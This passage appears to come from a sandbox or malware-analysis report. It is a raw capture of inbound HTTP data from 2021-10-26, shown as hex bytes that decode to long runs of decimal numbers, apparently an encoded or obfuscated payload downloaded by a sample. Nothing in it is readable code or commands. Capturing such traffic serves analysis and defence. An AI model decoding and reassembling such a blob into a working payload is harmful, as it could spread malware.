                    2021-10-26 16:59:38 UTC1896INData Raw: 34 20 31 32 35 20 31 36 31 20 38 39 20 33 35 20 32 31 32 20 32 31 34 20 38 39 20 31 36 39 20 31 36 39 20 32 30 30 20 36 36 20 36 39 20 31 30 32 20 31 33 30 20 32 34 20 39 31 20 32 30 20 32 30 35 20 32 31 34 20 32 31 36 20 32 31 35 20 33 38 20 31 39 33 20 32 31 33 20 31 37 36 20 31 31 35 20 36 33 20 31 38 39 20 31 35 34 20 37 20 31 36 20 32 32 20 32 31 34 20 38 37 20 32 32 36 20 31 39 36 20 31 36 37 20 31 33 38 20 37 30 20 39 34 20 39 38 20 31 31 34 20 31 33 37 20 32 34 37 20 39 36 20 31 34 30 20 31 33 31 20 31 30 32 20 31 34 20 32 33 37 20 36 31 20 39 33 20 32 35 35 20 39 38 20 31 33 32 20 34 32 20 32 33 20 36 35 20 34 30 20 31 39 30 20 32 30 20 31 38 30 20 31 35 33 20 31 35 32 20 31 36 31 20 32 30 33 20 31 31 33 20 31 34 33 20 31 34 35 20 31 38 30 20 34
                    Data Ascii: 4 125 161 89 35 212 214 89 169 169 200 66 69 102 130 24 91 20 205 214 216 215 38 193 213 176 115 63 189 154 7 16 22 214 87 226 196 167 138 70 94 98 114 137 247 96 140 131 102 14 237 61 93 255 98 132 42 23 65 40 190 20 180 153 152 161 203 113 143 145 180 4
                    2021-10-26 16:59:38 UTC1899INData Raw: 20 32 30 39 20 31 20 32 36 20 31 32 36 20 32 32 32 20 31 38 39 20 32 34 33 20 34 37 20 35 31 20 38 38 20 31 38 39 20 32 31 38 20 31 34 35 20 31 35 31 20 34 32 20 32 34 31 20 32 34 34 20 31 34 38 20 31 38 39 20 31 32 35 20 37 34 20 32 32 30 20 31 34 30 20 39 20 30 20 31 31 32 20 39 31 20 33 38 20 38 33 20 31 34 38 20 31 31 36 20 32 31 35 20 31 34 36 20 32 31 38 20 38 34 20 34 38 20 33 38 20 33 39 20 35 30 20 35 31 20 34 38 20 35 31 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 32 34 20 35 30 20 34 38 20 35 30 20 36 34 20 31 30 32 20 39 32 20 36 39 20 36 37 20 36 39 20 32 20 37 20 30 20 31 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 37 20 35 30 20 39 32 20 35 30 20 35 34 20 38 34 20 32 31 34 20 34 38 20 31 30 39 20 31 31 32 20 31 37
                    Data Ascii: 209 1 26 126 222 189 243 47 51 88 189 218 145 151 42 241 244 148 189 125 74 220 140 9 0 112 91 38 83 148 116 215 146 218 84 48 38 39 50 51 48 51 54 84 114 117 109 124 50 48 50 64 102 92 69 67 69 2 7 0 1 84 114 117 109 117 50 92 50 54 84 214 48 109 112 17
                    2021-10-26 16:59:38 UTC1903INData Raw: 31 31 35 20 31 30 39 20 31 39 37 20 35 37 20 36 35 20 35 37 20 34 38 20 38 34 20 31 38 30 20 31 32 36 20 32 38 20 31 32 33 20 35 32 20 34 38 20 32 33 37 20 36 31 20 33 37 20 31 32 31 20 31 31 35 20 31 30 39 20 31 33 30 20 35 37 20 36 35 20 35 37 20 34 38 20 38 34 20 31 31 32 20 31 32 31 20 32 38 20 31 32 33 20 35 32 20 34 38 20 33 39 20 35 38 20 31 32 34 20 31 32 36 20 31 31 35 20 31 30 39 20 35 30 20 36 32 20 32 34 20 36 32 20 34 38 20 38 34 20 33 33 20 31 32 31 20 36 39 20 31 32 34 20 35 32 20 34 38 20 38 34 20 35 38 20 31 32 34 20 31 32 36 20 31 31 35 20 31 30 39 20 36 20 36 32 20 32 34 20 36 32 20 34 38 20 38 34 20 32 34 35 20 31 32 31 20 35 32 20 31 31 32 20 35 32 20 34 38 20 31 38 38 20 35 38 20 31 33 20 31 31 34 20 31 31 35 20 31 30 39 20 32 30 39
                    Data Ascii: 115 109 197 57 65 57 48 84 180 126 28 123 52 48 237 61 37 121 115 109 130 57 65 57 48 84 112 121 28 123 52 48 39 58 124 126 115 109 50 62 24 62 48 84 33 121 69 124 52 48 84 58 124 126 115 109 6 62 24 62 48 84 245 121 52 112 52 48 188 58 13 114 115 109 209
                    2021-10-26 16:59:38 UTC1907INData Raw: 31 32 20 35 39 20 35 31 20 31 34 30 20 35 34 20 31 35 33 20 31 31 35 20 31 32 36 20 31 30 38 20 31 31 32 20 35 30 20 31 37 35 20 34 32 20 35 34 20 38 34 20 31 32 33 20 31 31 38 20 31 37 33 20 31 31 32 20 32 35 35 20 34 39 20 35 31 20 35 34 20 38 34 20 31 31 34 20 32 32 30 20 31 31 37 20 31 31 32 20 35 30 20 31 37 20 34 39 20 32 35 34 20 38 34 20 31 39 31 20 31 31 36 20 31 30 38 20 31 31 33 20 35 30 20 34 38 20 31 33 36 20 34 36 20 38 34 20 31 31 34 20 31 31 36 20 31 30 38 20 31 38 34 20 35 30 20 32 32 35 20 35 31 20 35 35 20 38 35 20 31 31 34 20 31 31 37 20 31 37 31 20 31 30 34 20 35 30 20 34 38 20 35 31 20 35 35 20 31 35 32 20 31 31 34 20 31 36 34 20 31 30 38 20 31 31 33 20 35 31 20 34 38 20 35 30 20 32 32 38 20 37 36 20 31 31 34 20 31 31 37 20 31 30 38
                    Data Ascii: 12 59 51 140 54 153 115 126 108 112 50 175 42 54 84 123 118 173 112 255 49 51 54 84 114 220 117 112 50 17 49 254 84 191 116 108 113 50 48 136 46 84 114 116 108 184 50 225 51 55 85 114 117 171 104 50 48 51 55 152 114 164 108 113 51 48 50 228 76 114 117 108
                    2021-10-26 16:59:38 UTC1911INData Raw: 32 38 20 32 30 31 20 32 34 37 20 35 31 20 35 34 20 33 34 20 33 39 20 32 34 31 20 38 31 20 31 31 34 20 31 30 37 20 31 31 32 20 33 31 20 31 34 39 20 31 35 33 20 35 33 20 38 32 20 31 31 34 20 36 30 20 32 30 30 20 31 38 30 20 35 30 20 35 34 20 35 30 20 38 33 20 32 34 31 20 31 30 38 20 31 31 33 20 31 30 37 20 31 31 32 20 31 37 39 20 31 34 39 20 34 34 20 35 30 20 38 32 20 31 31 34 20 32 33 32 20 32 30 30 20 32 34 37 20 35 31 20 35 34 20 35 30 20 31 34 33 20 32 34 31 20 32 34 35 20 31 31 36 20 31 30 37 20 31 31 32 20 32 33 31 20 31 34 39 20 31 38 31 20 35 35 20 38 32 20 31 31 34 20 31 33 32 20 32 30 30 20 38 37 20 35 33 20 35 34 20 35 32 20 37 31 20 36 32 20 35 31 20 31 31 32 20 35 39 20 32 34 30 20 32 33 30 20 33 38 20 38 20 34 39 20 32 20 32 34 32 20 31 36 37
                    Data Ascii: 28 201 247 51 54 34 39 241 81 114 107 112 31 149 153 53 82 114 60 200 180 50 54 50 83 241 108 113 107 112 179 149 44 50 82 114 232 200 247 51 54 50 143 241 245 116 107 112 231 149 181 55 82 114 132 200 87 53 54 52 71 62 51 112 59 240 230 38 8 49 2 242 167
                    2021-10-26 16:59:38 UTC1915INData Raw: 20 34 38 20 35 32 20 35 34 20 31 30 34 20 39 32 20 38 38 20 31 30 38 20 35 32 20 35 30 20 31 30 38 20 36 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 37 20 31 31 32 20 37 30 20 33 30 20 38 35 20 35 34 20 31 37 20 31 31 34 20 32 32 35 20 38 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 34 38 20 38 34 20 32 32 36 20 39 31 20 31 30 20 31 31 32 20 31 31 39 20 34 38 20 32 35 30 20 32 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 33 20 35 30 20 31 35 36 20 32 38 20 31 37 31 20 38 35 20 35 35 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 39 20 35 34 20 38 32 20 31 30 36 20 31 33 34 20 31 31 39 20 31 35 38 20 35 30 20 31 31 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 31 31 36 20 35 31 20 32 30 34 20
                    Data Ascii: 48 52 54 104 92 88 108 52 50 108 6 54 84 114 117 107 112 70 30 85 54 17 114 225 89 112 50 48 50 48 84 226 91 10 112 119 48 250 2 84 114 117 109 113 50 156 28 171 85 55 117 109 112 50 48 49 54 82 106 134 119 158 50 118 50 54 84 114 117 110 112 116 51 204
                    2021-10-26 16:59:38 UTC1920INData Raw: 31 31 30 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 30 30 20 31 30 39 20 31 34 35 20 31 32 32 20 32 33 31 20 34 38 20 37 34 20 38 34 20 36 32 20 34 32 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 33 35 20 35 34 20 32 39 20 35 39 20 32 30 37 20 31 30 39 20 31 34 20 35 30 20 37 32 20 38 32 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 32 33 20 31 31 32 20 31 35 35 20 31 32 31 20 31 33 36 20 35 34 20 34 33 20 31 31 34 20 38 39 20 31 32 20 31 31 32 20 35 30 20 34 38 20 35 30 20 33 39 20 38 34 20 31 33 35 20 36 30 20 31 37 38 20 31 31 34 20 31 37 38 20 34 38 20 37 34 20 38 37 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 32 20 35 30 20 31 30 39 20 31 32 30 20 32 33 33 20 38 36 20 32 34 30 20 31 31 37 20 36 35 20 31 38 20 35 30 20 34 38 20 35 30 20
                    Data Ascii: 110 50 54 84 114 100 109 145 122 231 48 74 84 62 42 109 112 50 48 35 54 29 59 207 109 14 50 72 82 54 84 114 117 123 112 155 121 136 54 43 114 89 12 112 50 48 50 39 84 135 60 178 114 178 48 74 87 84 114 117 109 102 50 109 120 233 86 240 117 65 18 50 48 50
                    2021-10-26 16:59:38 UTC1924INData Raw: 38 20 32 33 20 38 31 20 31 31 34 20 31 31 38 20 31 33 38 20 31 30 39 20 31 34 30 20 37 33 20 34 38 20 35 30 20 36 32 20 38 34 20 32 32 35 20 31 31 37 20 31 33 36 20 32 33 20 32 39 20 35 32 20 34 38 20 35 35 20 38 34 20 32 34 30 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 38 32 20 34 32 20 31 39 37 20 37 38 20 37 35 20 31 31 33 20 31 31 30 20 31 31 33 20 36 20 31 37 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 32 34 33 20 31 30 39 20 31 37 37 20 39 30 20 31 31 32 20 35 34 20 35 30 20 38 35 20 33 34 20 32 34 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 31 38 30 20 35 34 20 31 36 35 20 32 36 20 35 31 20 31 30 35 20 31 31 36 20 35 31 20 31 36 30 20 31 37 36 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 32 33 35 20 31 31 32 20 31 39 20 38 39 20 31 37
                    Data Ascii: 8 23 81 114 118 138 109 140 73 48 50 62 84 225 117 136 23 29 52 48 55 84 240 117 109 112 50 182 42 197 78 75 113 110 113 6 178 50 54 84 114 243 109 177 90 112 54 50 85 34 247 109 112 50 48 180 54 165 26 51 105 116 51 160 176 54 84 114 117 235 112 19 89 17
                    2021-10-26 16:59:38 UTC1928INData Raw: 30 39 20 31 30 32 20 35 30 20 36 39 20 31 37 38 20 31 30 20 38 36 20 37 31 20 31 31 36 20 31 33 20 32 31 36 20 35 30 20 34 38 20 35 30 20 35 34 20 36 36 20 31 31 34 20 32 30 38 20 32 33 37 20 37 36 20 34 38 20 35 20 35 31 20 32 34 36 20 32 35 32 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 35 20 34 38 20 32 33 31 20 31 38 32 20 31 31 33 20 31 31 39 20 36 34 20 31 30 38 20 31 32 34 20 31 35 35 20 34 38 20 35 30 20 35 34 20 38 34 20 39 39 20 31 31 37 20 31 30 34 20 32 34 31 20 32 35 20 35 33 20 37 20 35 35 20 31 36 20 32 31 39 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 33 38 20 35 30 20 38 33 20 32 31 33 20 36 34 20 31 31 32 20 39 31 20 31 31 33 20 31 39 30 20 31 35 33 20 35 30 20 35 34 20 38 34 20 31 31 34 20 39 39 20 31 30 39 20 32 30 31 20
                    Data Ascii: 09 102 50 69 178 10 86 71 116 13 216 50 48 50 54 66 114 208 237 76 48 5 51 246 252 114 117 109 112 35 48 231 182 113 119 64 108 124 155 48 50 54 84 99 117 104 241 25 53 7 55 16 219 117 109 112 50 38 50 83 213 64 112 91 113 190 153 50 54 84 114 99 109 201
                    2021-10-26 16:59:38 UTC1931INData Raw: 32 34 38 20 32 33 20 35 30 20 38 33 20 35 31 20 31 35 34 20 32 32 35 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 32 20 34 38 20 31 38 32 20 31 36 33 20 31 31 35 20 31 31 35 20 32 32 20 31 30 38 20 30 20 31 33 32 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 35 20 31 31 37 20 31 38 31 20 32 32 39 20 32 31 20 34 39 20 38 37 20 35 35 20 32 34 20 31 39 37 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 31 38 20 31 39 34 20 35 30 20 31 31 35 20 31 30 20 31 31 33 20 35 30 20 31 33 36 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 36 20 31 30 39 20 31 38 30 20 31 36 34 20 31 32 32 20 35 32 20 39 32 20 38 35 20 31 37 30 20 32 30 35 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 31 20 35 34 20 37 36 20 32 32 39 20 32 33 37 20 31 30
                    Data Ascii: 248 23 50 83 51 154 225 114 117 109 112 52 48 182 163 115 115 22 108 0 132 48 50 54 84 115 117 181 229 21 49 87 55 24 197 117 109 112 50 49 50 118 194 50 115 10 113 50 136 50 54 84 114 116 109 180 164 122 52 92 85 170 205 109 112 50 48 51 54 76 229 237 10
                    2021-10-26 16:59:38 UTC1935INData Raw: 31 34 20 31 33 20 36 34 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 33 34 20 31 32 31 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 35 34 20 33 30 20 35 30 20 35 34 20 38 35 20 31 31 34 20 34 35 20 36 37 20 31 31 32 20 35 30 20 34 39 20 35 30 20 32 35 34 20 31 32 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 32 31 34 20 33 30 20 35 30 20 35 34 20 38 36 20 31 31 34 20 31 31 37 20 36 36 20 31 31 32 20 35 30 20 34 39 20 35 30 20 34 32 20 31 32 33 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 30 20 33 31 20 35 30 20 35 34 20 38 37 20 31 31 34 20 32 39 20 36 36 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 37 34 20 31 32 33 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 32 35 30 20 33 31 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 30
                    Data Ascii: 14 13 64 112 50 49 50 134 121 114 117 108 112 54 30 50 54 85 114 45 67 112 50 49 50 254 122 114 117 108 112 214 30 50 54 86 114 117 66 112 50 49 50 42 123 114 117 111 112 10 31 50 54 87 114 29 66 112 50 49 50 174 123 114 117 108 112 250 31 50 54 85 114 10
                    2021-10-26 16:59:38 UTC1939INData Raw: 20 31 31 34 20 32 30 38 20 30 20 31 31 32 20 35 30 20 34 39 20 35 30 20 32 33 20 35 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 39 35 20 39 34 20 35 30 20 35 34 20 38 36 20 31 31 34 20 32 35 32 20 33 20 31 31 32 20 35 30 20 35 31 20 35 30 20 31 34 37 20 35 38 20 31 31 34 20 31 31 37 20 31 30 35 20 31 31 32 20 32 34 33 20 39 34 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 32 30 20 32 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 31 31 20 35 39 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 32 37 20 36 34 20 35 30 20 35 34 20 38 35 20 31 31 34 20 32 34 30 20 32 39 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 35 31 20 33 36 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 34 33 20 36 34 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 37 32
                    Data Ascii: 114 208 0 112 50 49 50 23 58 114 117 108 112 95 94 50 54 86 114 252 3 112 50 51 50 147 58 114 117 105 112 243 94 50 54 85 114 120 2 112 50 49 50 111 59 114 117 108 112 127 64 50 54 85 114 240 29 112 50 49 50 151 36 114 117 111 112 143 64 50 54 85 114 172
                    2021-10-26 16:59:38 UTC1943INData Raw: 30 38 20 31 33 31 20 34 30 20 31 30 37 20 35 33 20 31 37 35 20 38 34 20 32 32 37 20 38 34 20 31 33 37 20 31 31 32 20 31 37 31 20 34 38 20 31 37 33 20 32 33 20 31 37 36 20 31 31 34 20 32 33 36 20 31 30 39 20 31 39 34 20 31 39 20 32 31 37 20 35 30 20 31 35 39 20 38 34 20 34 39 20 38 32 20 38 34 20 31 31 33 20 31 35 35 20 34 38 20 39 39 20 31 37 20 38 31 20 31 31 35 20 32 32 30 20 31 30 39 20 37 20 32 31 20 31 33 20 35 31 20 31 35 39 20 38 34 20 32 33 36 20 38 32 20 31 30 20 31 31 32 20 31 34 37 20 35 31 20 31 39 33 20 34 34 20 35 31 20 31 31 34 20 32 32 30 20 31 30 39 20 32 31 37 20 32 31 20 31 31 34 20 35 31 20 31 35 39 20 38 34 20 31 32 30 20 39 33 20 31 30 34 20 31 31 33 20 31 35 35 20 34 38 20 31 20 33 30 20 35 31 20 31 31 34 20 32 30 34 20 31 30 39 20
                    Data Ascii: 08 131 40 107 53 175 84 227 84 137 112 171 48 173 23 176 114 236 109 194 19 217 50 159 84 49 82 84 113 155 48 99 17 81 115 220 109 7 21 13 51 159 84 236 82 10 112 147 51 193 44 51 114 220 109 217 21 114 51 159 84 120 93 104 113 155 48 1 30 51 114 204 109
                    2021-10-26 16:59:38 UTC1947INData Raw: 31 31 20 31 38 20 31 35 38 20 31 37 32 20 35 30 20 31 38 33 20 38 36 20 33 30 20 32 31 37 20 33 39 20 31 31 36 20 31 33 31 20 35 31 20 36 38 20 31 35 34 20 37 32 20 31 32 37 20 31 35 36 20 31 30 39 20 32 35 31 20 31 35 38 20 31 38 20 36 33 20 37 31 20 38 36 20 32 32 36 20 32 31 37 20 31 39 38 20 31 31 35 20 36 37 20 35 30 20 31 36 37 20 31 35 34 20 31 38 20 31 32 37 20 34 20 31 30 35 20 32 35 31 20 31 35 38 20 31 32 34 20 36 33 20 31 33 35 20 38 37 20 32 31 31 20 32 31 37 20 35 31 20 31 32 35 20 39 31 20 35 32 20 31 32 30 20 31 35 37 20 32 34 32 20 31 31 34 20 35 32 20 31 31 31 20 31 33 31 20 34 30 20 35 33 20 35 31 20 31 31 39 20 38 36 20 31 39 39 20 32 31 37 20 31 34 37 20 31 32 30 20 35 39 20 35 33 20 31 39 33 20 34 34 20 33 38 20 31 32 37 20 31 30 30
                    Data Ascii: 11 18 158 172 50 183 86 30 217 39 116 131 51 68 154 72 127 156 109 251 158 18 63 71 86 226 217 198 115 67 50 167 154 18 127 4 105 251 158 124 63 135 87 211 217 51 125 91 52 120 157 242 114 52 111 131 40 53 51 119 86 199 217 147 120 59 53 193 44 38 127 100
                    2021-10-26 16:59:38 UTC1952INData Raw: 31 31 31 20 39 39 20 31 33 31 20 35 35 20 35 34 20 31 37 35 20 38 36 20 31 32 39 20 31 31 31 20 31 38 32 20 39 38 20 31 37 31 20 35 30 20 31 32 38 20 31 35 36 20 35 33 20 31 31 36 20 32 34 34 20 31 31 31 20 31 30 39 20 31 33 31 20 39 20 35 31 20 31 37 35 20 38 36 20 31 34 30 20 32 32 33 20 31 35 32 20 31 32 32 20 31 37 39 20 35 30 20 36 34 20 31 33 34 20 38 31 20 39 37 20 35 32 20 31 31 31 20 31 33 31 20 34 30 20 38 39 20 35 32 20 31 38 33 20 38 36 20 39 31 20 31 39 36 20 31 30 30 20 39 39 20 31 37 39 20 35 30 20 30 20 31 33 35 20 32 34 32 20 31 31 34 20 34 34 20 31 30 34 20 37 37 20 31 33 31 20 36 31 20 33 33 20 31 38 33 20 38 36 20 35 39 20 31 39 36 20 31 32 37 20 39 39 20 31 37 39 20 35 30 20 31 30 33 20 31 33 35 20 30 20 39 38 20 32 34 34 20 31 31 31
                    Data Ascii: 111 99 131 55 54 175 86 129 111 182 98 171 50 128 156 53 116 244 111 109 131 9 51 175 86 140 223 152 122 179 50 64 134 81 97 52 111 131 40 89 52 183 86 91 196 100 99 179 50 0 135 242 114 44 104 77 131 61 33 183 86 59 196 127 99 179 50 103 135 0 98 244 111
                    2021-10-26 16:59:38 UTC1962INData Raw: 20 32 30 20 30 20 32 31 20 31 32 35 20 38 32 20 38 38 20 38 33 20 35 35 20 36 20 35 34 20 32 20 32 38 20 39 34 20 38 35 20 38 31 20 36 36 20 36 31 20 32 39 20 32 37 20 31 30 39 20 34 39 20 38 31 20 36 38 20 39 31 20 36 34 20 35 33 20 36 20 32 36 20 33 31 20 31 31 32 20 31 31 35 20 36 34 20 36 36 20 31 31 34 20 35 39 20 33 31 20 32 30 20 34 20 33 30 20 35 30 20 31 31 33 20 36 34 20 38 31 20 33 33 20 33 31 20 31 36 20 33 20 34 20 31 31 39 20 37 32 20 38 31 20 38 33 20 33 36 20 36 20 32 38 20 32 20 33 30 20 35 30 20 31 31 33 20 36 34 20 38 31 20 33 33 20 33 31 20 31 36 20 33 20 34 20 31 32 35 20 36 39 20 37 30 20 31 32 31 20 35 30 20 33 32 20 32 30 20 33 20 32 33 20 38 37 20 31 31 37 20 37 34 20 38 35 20 34 39 20 32 20 31 20 34 20 33 31 20 39 32 20 34 38 20
                    Data Ascii: 20 0 21 125 82 88 83 55 6 54 2 28 94 85 81 66 61 29 27 109 49 81 68 91 64 53 6 26 31 112 115 64 66 114 59 31 20 4 30 50 113 64 81 33 31 16 3 4 119 72 81 83 36 6 28 2 30 50 113 64 81 33 31 16 3 4 125 69 70 121 50 32 20 3 23 87 117 74 85 49 2 1 4 31 92 48
                    2021-10-26 16:59:38 UTC1968INData Raw: 39 35 20 38 35 20 31 32 32 20 38 33 20 35 36 20 32 20 31 36 20 33 31 20 33 20 35 30 20 39 39 20 37 31 20 37 30 20 33 36 20 30 20 31 36 20 33 30 20 33 20 31 32 33 20 39 32 20 38 36 20 38 37 20 33 39 20 33 31 20 35 32 20 32 35 20 34 20 36 34 20 38 39 20 38 30 20 36 37 20 33 32 20 32 33 20 31 31 37 20 34 36 20 33 31 20 39 35 20 31 30 32 20 39 31 20 36 39 20 36 31 20 31 36 20 32 35 20 38 20 34 39 20 37 30 20 36 38 20 36 34 20 39 35 20 35 34 20 37 20 31 20 38 20 31 31 32 20 39 37 20 37 33 20 36 35 20 36 36 20 34 39 20 33 31 20 39 31 20 36 33 20 35 20 39 32 20 36 38 20 39 31 20 39 31 20 34 39 20 39 32 20 36 30 20 33 20 34 20 38 37 20 36 36 20 39 33 20 37 30 20 37 20 32 33 20 37 20 32 37 20 32 35 20 38 31 20 38 35 20 36 35 20 35 34 20 31 39 20 37 20 32 38 20 39
                    Data Ascii: 95 85 122 83 56 2 16 31 3 50 99 71 70 36 0 16 30 3 123 92 86 87 39 31 52 25 4 64 89 80 67 32 23 117 46 31 95 102 91 69 61 16 25 8 49 70 68 64 95 54 7 1 8 112 97 73 65 66 49 31 91 63 5 92 68 91 91 49 92 60 3 4 87 66 93 70 7 23 7 27 25 81 85 65 54 19 7 28 9
                    2021-10-26 16:59:38 UTC1984INData Raw: 20 32 38 20 32 34 20 34 37 20 31 30 36 20 31 30 33 20 36 34 20 38 31 20 31 30 39 20 33 37 20 33 33 20 33 34 20 37 20 31 20 38 38 20 31 30 30 20 31 31 34 20 35 20 31 37 20 33 37 20 38 35 20 34 32 20 38 31 20 31 31 33 20 31 31 32 20 31 32 34 20 32 34 20 32 39 20 35 36 20 35 32 20 34 20 31 31 35 20 31 30 35 20 32 20 31 32 36 20 35 30 20 33 32 20 32 33 20 31 32 20 35 30 20 31 32 34 20 32 20 36 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 33 35 20 31 30 37 20 39 31 20 38 37 20 37 20 32 33 20 34 38 20 34 38 20 31 30 20 36 33 20 39 38 20 35 20 31 30 31 20 39 34 20 31 36 20 33 35 20 37 31 20 32 36 20 35 31 20 31 32 35 20 38 38 20 31 31 35 20 31 31 20 31 30 35 20 31 31 34 20 38 36 20 38 30 20 31 20 31 30 33 20 30 20 36 38 20 39 32 20 33 33 20 30 20 33 34 20 33
                    Data Ascii: 28 24 47 106 103 64 81 109 37 33 34 7 1 88 100 114 5 17 37 85 42 81 113 112 124 24 29 56 52 4 115 105 2 126 50 32 23 12 50 124 2 6 11 84 81 72 28 35 107 91 87 7 23 48 48 10 63 98 5 101 94 16 35 71 26 51 125 88 115 11 105 114 86 80 1 103 0 68 92 33 0 34 3
                    2021-10-26 16:59:38 UTC1994INData Raw: 20 35 39 20 32 33 20 35 36 20 31 30 20 38 36 20 31 30 36 20 31 30 34 20 31 31 39 20 31 30 35 20 37 39 20 31 31 37 20 37 38 20 37 37 20 36 37 20 36 35 20 39 36 20 38 33 20 34 39 20 33 31 20 34 37 20 39 20 32 34 20 31 32 32 20 39 30 20 33 20 36 34 20 34 39 20 35 31 20 33 33 20 35 39 20 34 32 20 38 30 20 31 30 31 20 30 20 31 30 35 20 35 20 37 39 20 37 32 20 31 30 39 20 38 33 20 31 35 20 36 35 20 31 30 37 20 31 32 37 20 31 31 32 20 36 33 20 32 38 20 34 37 20 32 30 20 37 32 20 38 33 20 36 36 20 39 30 20 35 34 20 32 30 20 36 36 20 34 32 20 31 20 36 34 20 31 30 31 20 38 34 20 31 20 32 39 20 32 31 20 37 32 20 38 30 20 31 31 32 20 31 37 20 31 33 20 36 37 20 31 31 34 20 31 37 20 31 37 20 35 36 20 38 35 20 35 39 20 39 33 20 36 36 20 31 31 39 20 38 32 20 32 33 20 32
                    Data Ascii: 59 23 56 10 86 106 104 119 105 79 117 78 77 67 65 96 83 49 31 47 9 24 122 90 3 64 49 51 33 59 42 80 101 0 105 5 79 72 109 83 15 65 107 127 112 63 28 47 20 72 83 66 90 54 20 66 42 1 64 101 84 1 29 21 72 80 112 17 13 67 114 17 17 56 85 59 93 66 119 82 23 2
                    2021-10-26 16:59:38 UTC2010INData Raw: 20 38 30 20 34 20 35 33 20 36 20 34 35 20 34 34 20 35 37 20 31 32 35 20 39 33 20 31 32 36 20 31 38 20 31 39 20 32 38 20 32 37 20 36 20 38 34 20 36 34 20 32 20 39 33 20 31 32 30 20 32 34 20 35 34 20 33 35 20 33 30 20 35 33 20 37 35 20 39 33 20 31 32 32 20 38 34 20 34 34 20 36 33 20 32 36 20 38 30 20 31 31 32 20 31 37 20 31 33 20 36 37 20 36 38 20 33 30 20 31 39 20 32 36 20 32 37 20 35 32 20 38 30 20 39 34 20 34 20 37 20 39 36 20 36 38 20 32 34 20 34 37 20 32 20 39 30 20 31 31 38 20 38 30 20 39 39 20 32 35 20 31 36 20 32 20 38 30 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 35 30 20 32 39 20 35 36 20 35 39 20 35 38 20 31 32 32 20 38 36 20 38 39 20 36 20 32 32 20 32 38 20 35 36 20 33 30 20 36 38 20 37 34 20 36 20 39 35 20 31 32 36 20 32 37 20 36 39 20 36
                    Data Ascii: 80 4 53 6 45 44 57 125 93 126 18 19 28 27 6 84 64 2 93 120 24 54 35 30 53 75 93 122 84 44 63 26 80 112 17 13 67 68 30 19 26 27 52 80 94 4 7 96 68 24 47 2 90 118 80 99 25 16 2 80 77 50 19 15 71 50 29 56 59 58 122 86 89 6 22 28 56 30 68 74 6 95 126 27 69 6
                    2021-10-26 16:59:38 UTC2026INData Raw: 37 34 20 37 34 20 38 32 20 31 33 20 38 36 20 33 39 20 39 30 20 32 31 20 37 31 20 31 32 35 20 32 20 38 37 20 31 31 20 34 20 32 20 38 30 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 33 38 20 33 31 20 32 30 20 32 37 20 35 39 20 36 20 39 31 20 38 30 20 38 31 20 31 38 20 33 38 20 31 38 20 35 33 20 36 37 20 31 30 39 20 31 32 31 20 31 30 33 20 39 30 20 31 37 20 32 39 20 33 39 20 32 36 20 37 37 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 32 33 20 31 36 20 39 32 20 32 34 20 30 20 31 30 34 20 36 39 20 31 30 30 20 32 32 20 35 36 20 33 20 32 30 20 36 36 20 38 35 20 31 31 31 20 31 30 39 20 31 31 30 20 39 36 20 36 36 20 31 36 20 33 20 33 33 20 31 35 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20 32 39 20 39 30 20 32 30 20 39 31 20 31 32 30 20 33 20 32 20 36 32
                    Data Ascii: 74 74 82 13 86 39 90 21 71 125 2 87 11 4 2 80 77 50 19 15 71 38 31 20 27 59 6 91 80 81 18 38 18 53 67 109 121 103 90 17 29 39 26 77 15 48 17 11 37 23 16 92 24 0 104 69 100 22 56 3 20 66 85 111 109 110 96 66 16 3 33 15 13 50 21 105 3 29 90 20 91 120 3 2 62
